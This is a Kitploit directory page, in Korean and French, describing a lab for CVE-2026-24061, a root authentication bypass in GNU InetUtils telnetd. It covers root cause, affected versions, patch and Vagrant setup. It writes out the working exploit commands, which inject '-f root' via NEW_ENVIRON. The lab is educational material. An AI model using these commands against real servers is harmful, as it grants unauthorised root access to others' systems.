Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-24061-lab — # CVE-2026-24061 재현 실습 환경 GNU InetUtils telnetd의 인증 우회 취약점인 CVE-2026-24061을 위한 재현 실습 환경입니다. Vagrant 기반의 격리된 환경과 단계별 익스플로잇 지침을 제공하여 루트 셸 접근을 시연합니다. | Kitploit
도구/GitHubGitHub/akpmarcelin/cve-2026-24061-lab
Vulnerability AnalysisExploitationPenetration TestingAuthenticationLearning & EducationLabs & Practice
GitHubakpmarcelin/cve-2026-24061-lab

CVE-2026-24061-lab

# CVE-2026-24061 재현 실습 환경 GNU InetUtils telnetd의 인증 우회 취약점인 CVE-2026-24061을 위한 재현 실습 환경입니다. Vagrant 기반의 격리된 환경과 단계별 익스플로잇 지침을 제공하여 루트 셸 접근을 시연합니다.

저장소 보기
12개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-24061 — 재현 랩

⚠️ 교육 목적으로만 사용하세요. 격리된 실습 환경입니다.

Français ci-dessous


요약

GNU InetUtils telnetd ≤ 2.7의 치명적인 인증 우회(CVSS 9.8)입니다. Telnet NEW_ENVIRON 옵션을 통해 USER 변수로 -f root를 주입하면, 인증되지 않은 공격자가 비밀번호 없이 루트 셸을 획득할 수 있습니다.

근본 원인

Telnet 협상 중 클라이언트로부터 수신된 USER 변수는 검증 없이 직접 /usr/bin/login에 전달됩니다:

root@kitploit:~
/usr/bin/login -p -f root

-f 플래그는 login이 지정된 사용자에 대한 비밀번호 검증을 건너뛰도록 지시합니다. 이 동작은 RFC 1572(7장)에 알려진 위험으로 문서화되어 있습니다. 그런데도 이 버그는 inetutils에 10년 이상 존재했습니다.

영향받는 버전

GNU InetUtils telnetd 1.9.3~2.7

패치

GNU InetUtils ≥ 2.7-2로 업그레이드하세요.

실습 환경 구성

이 실습은 Vagrant를 사용하여 취약한 버전의 telnetd(inetutils 2.5, 소스에서 컴파일)를 실행하는 실제 격리 VM을 프로비저닝하여 실제 환경에 최대한 가깝게 구성합니다.

요구 사항: 머신에 Vagrant + VirtualBox가 설치되어 있어야 합니다.

root@kitploit:~
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up

VM은 IP 192.168.56.10으로 시작하고 telnetd는 23번 포트에서 수신 대기합니다.

실습 환경 프로비저닝 완료

악용

호스트 머신에서:

root@kitploit:~
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23

USER 변수는 로그인 프롬프트가 나타나기 전, 협상 단계에서 NEW_ENVIRON Telnet 옵션을 통해 주입됩니다.

VM에 연결됨 루트 셸 획득

참고 자료

  • NVD — CVE-2026-24061
  • RFC 1572 — Telnet 환경 옵션
  • GNU InetUtils 소스 — telnetd/sys_term.c

저자

Agokoli



CVE-2026-24061 — Lab de démonstration

⚠️ Usage éducatif uniquement. Environnement isolé.

English above


Résumé

Contournement d'authentification critique (CVSS 9.8) dans GNU InetUtils telnetd ≤ 2.7. En injectant -f root comme valeur de la variable USER via l'option Telnet NEW_ENVIRON, un attaquant non authentifié peut obtenir un shell root sans aucun mot de passe.

Cause racine

La variable USER reçue du client pendant la négociation Telnet est passée directement à /usr/bin/login sans validation :

root@kitploit:~
/usr/bin/login -p -f root

Le flag -f indique à login de ne pas vérifier le mot de passe pour l'utilisateur donné. Ce risque est documenté dans la RFC 1572 (Section 7) — pourtant le bug est resté présent dans inetutils pendant plus d'une décennie.

Versions affectées

GNU InetUtils telnetd 1.9.3 à 2.7

Correctif

Mettre à jour vers GNU InetUtils ≥ 2.7-2

Mise en place du lab

Ce lab utilise Vagrant pour provisionner une vraie VM isolée faisant tourner la version vulnérable de telnetd (inetutils 2.5, compilé depuis les sources), afin d'être au plus proche d'un environnement réel.

Prérequis : Vagrant + VirtualBox installés sur votre machine.

root@kitploit:~
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up

La VM démarre avec l'IP 192.168.56.10 et telnetd en écoute sur le port 23.

Lab provisionné

Exploitation

Depuis votre machine hôte :

root@kitploit:~
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23

La variable USER est injectée via l'option NEW_ENVIRON du protocole Telnet pendant la phase de négociation — avant même l'apparition du prompt login:.

Connexion à la VM Shell root obtenu

Références

  • NVD — CVE-2026-24061
  • RFC 1572 — Telnet Environment Option
  • Code source GNU InetUtils — telnetd/sys_term.c

Auteur

Agokoli

도구 다운로드